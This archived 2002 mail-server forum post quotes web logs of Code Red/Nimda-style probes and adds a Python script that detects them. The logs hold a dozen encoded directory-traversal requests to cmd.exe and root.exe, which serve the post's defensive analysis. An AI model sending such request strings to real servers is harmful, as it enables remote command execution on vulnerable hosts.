> > > Looks like the Code Red attack.
> > >
> > > If you are running IIS on this same box, just install M$'s URLScan, and
> > > it will stop most of it.
> > >
> > > Also it looks like they are spoofing a local ip (192.168.1.1).
> > >
> >
> > 192.162.1.1 is an interface on a firewall that proxies HTTP traffic; I will
> > look at firewall logs today and hopefully find where this is coming from.
> > We don't run IIS.
> >
>
> Tracked down attacking IP address to 61.183.69.15. How do I determine who this
> belongs to as it is not registered in DNS?
>
Well, as soon as I block 61.183.69.15 it is now coming from 65.93.178.234, which is unreachable now. Why would our little old mail server be targeted by such different IP subnets? I also wonder why the following code, which is going after IIS, would DOS iMail, since it is only a handful of requests that are initiated only once every few hours?

*******************************************
20020308 120025 Info - 192.168.1.6 GET / HTTP/1.0.
20020308 120047 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020308 120047 Request processed with no user agent and no referer.
20020308 120048 Info - 192.168.1.1 GET /MSADC/root.exe?/c+dir HTTP/1.0.
20020308 120048 Request processed with no user agent and no referer.
20020308 120048 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120048 Request processed with no user agent and no referer.
20020308 120049 Info - 192.168.1.1 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120049 Request processed with no user agent and no referer.
20020308 120050 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120050 Request processed with no user agent and no referer.
20020308 120051 Info - 192.168.1.1 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120051 Request processed with no user agent and no referer.
20020308 120051 Info - 192.168.1.1 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120051 Request processed with no user agent and no referer.
20020308 120052 Info - 192.168.1.1 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120052 Request processed with no user agent and no referer.
20020308 120053 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120053 Request processed with no user agent and no referer.
20020308 120054 Info - 192.168.1.1 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120054 Request processed with no user agent and no referer.
20020308 120054 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120054 Request processed with no user agent and no referer.
20020308 120055 Info - 192.168.1.1 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120055 Request processed with no user agent and no referer.
20020308 120056 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120056 Request processed with no user agent and no referer.
20020308 120057 Info - 192.168.1.1 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120057 Request processed with no user agent and no referer.
20020308 120057 Info - 192.168.1.1 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120057 Request processed with no user agent and no referer.
20020308 120058 Info - 192.168.1.1 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120058 Request processed with no user agent and no referer.
20020308 120126 Info - 192.168.1.6 GET / HTTP/1.0.
*******************************************

Also, what does "20020308 120050 Request processed with no user agent and no referer." mean?

Dan

Please visit http://www.ipswitch.com/support/mailing-lists.html to be removed from this list.
An Archive of this list is available at: http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
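The request set quoted above (root.exe and cmd.exe reached through single-, double- and overlong-UTF-8-encoded "..\" segments) is the probe sequence associated with the Code Red II and Nimda worms, and it is worth being able to pick it out of a web log mechanically rather than by eye. The script below is an added example; it is not code from the post, from Ipswitch or from iMail. The log layout it parses (date, time, "Info -", source IP, method, target, HTTP version, trailing period) is inferred from the lines quoted in the thread, the sample log is constructed from a subset of those lines, and the normalization and flagging rules are the editor's own. It undoes repeated percent-decoding, folds the 0xC0/0xC1 overlong sequences the way the targeted decoders did so the real path becomes visible, and then flags any request that resolves to a command interpreter or climbs above the web root, tallying hits per source address and counting the "no user agent" notes the server writes after each one.

```python
"""Triage of the root.exe / cmd.exe probe requests quoted in the thread.

Added example, not part of the original post and not iMail code.  The log
layout is inferred from the quoted lines; the normalization and flagging
rules are the editor's own.
"""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample: a subset of the lines quoted in the thread.
SAMPLE_LOG = """\
20020308 120025 Info - 192.168.1.6 GET / HTTP/1.0.
20020308 120047 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020308 120047 Request processed with no user agent and no referer.
20020308 120050 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120050 Request processed with no user agent and no referer.
20020308 120053 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120053 Request processed with no user agent and no referer.
20020308 120054 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020308 120054 Request processed with no user agent and no referer.
20020308 120126 Info - 192.168.1.6 GET / HTTP/1.0.
"""

REQUEST_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) Info - (?P<src>\S+) "
    r"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d\.?$")
NO_UA_RE = re.compile(r"^\d{8} \d{6} Request processed with no user agent")
SUSPICIOUS_BINARIES = {"cmd.exe", "root.exe"}


def fold_overlong_utf8(data: bytes) -> bytes:
    """Turn a 0xC0/0xC1 lead byte plus the byte after it into the ASCII byte
    it encodes (C0 AF -> '/', C1 9C -> '\\', C1 1C -> '\\').  A strict decoder
    rejects these; the decoders these probes target accepted them, so the
    detector folds them the same way in order to see the real path."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def normalize_path(target: str) -> tuple:
    """Return (resolved_path, escaped_web_root, encoding_class).

    Percent-decoding repeats until the bytes stop changing, so the double
    encoding '%255c' -> '%5c' -> '\\' is undone; backslashes then count as
    separators and '..' segments are resolved by hand so that a climb above
    the root is recorded rather than silently clipped."""
    data = target.split("?", 1)[0].encode("latin-1")
    rounds = 0
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    folded = fold_overlong_utf8(data)
    if folded != data:
        encoding = "overlong-utf8"
    elif rounds >= 2:
        encoding = "double-encoded"
    else:
        encoding = "percent-encoded" if rounds else "plain"
    stack, escaped = [], False
    for seg in folded.decode("latin-1").replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped, encoding


def analyze(log_text: str) -> dict:
    """Flag requests that resolve to a command interpreter or climb out of
    the web root; count the no-user-agent notes logged after them."""
    findings, no_user_agent = [], 0
    for line in log_text.splitlines():
        if NO_UA_RE.match(line):
            no_user_agent += 1
            continue
        m = REQUEST_RE.match(line)
        if not m:
            continue
        resolved, escaped, encoding = normalize_path(m["target"])
        reasons = []
        if resolved.rsplit("/", 1)[-1].lower() in SUSPICIOUS_BINARIES:
            reasons.append("command-interpreter")
        if escaped:
            reasons.append("traversal-outside-root")
        if reasons:
            findings.append({"time": m["date"] + " " + m["time"], "src": m["src"],
                             "raw": m["target"], "resolved": resolved,
                             "encoding": encoding, "reasons": reasons})
    return {"findings": findings,
            "by_source": Counter(f["src"] for f in findings),
            "no_user_agent": no_user_agent}
```

Calling `analyze(SAMPLE_LOG)` flags the four probe requests from 192.168.1.1 and none of the plain `GET /` lines from 192.168.1.6; with the full log from the post it would also resolve the `%%35%63`, `%25%35%63` and `%252f` variants to the same `/winnt/system32/cmd.exe`. Two design points matter for a detector like this: decoding is deliberately more permissive than a correct server would be, because the point is to see the path the vulnerable decoder would have produced, and the traversal flag is raised on the attempt to climb above the root rather than on the final path, so a probe is caught even when the resolved path looks innocuous. The "no user agent and no referer" lines are counted separately because the server records one after each probe; automated scanners of this kind send neither header, which is a useful secondary signal when the decoded path is ambiguous.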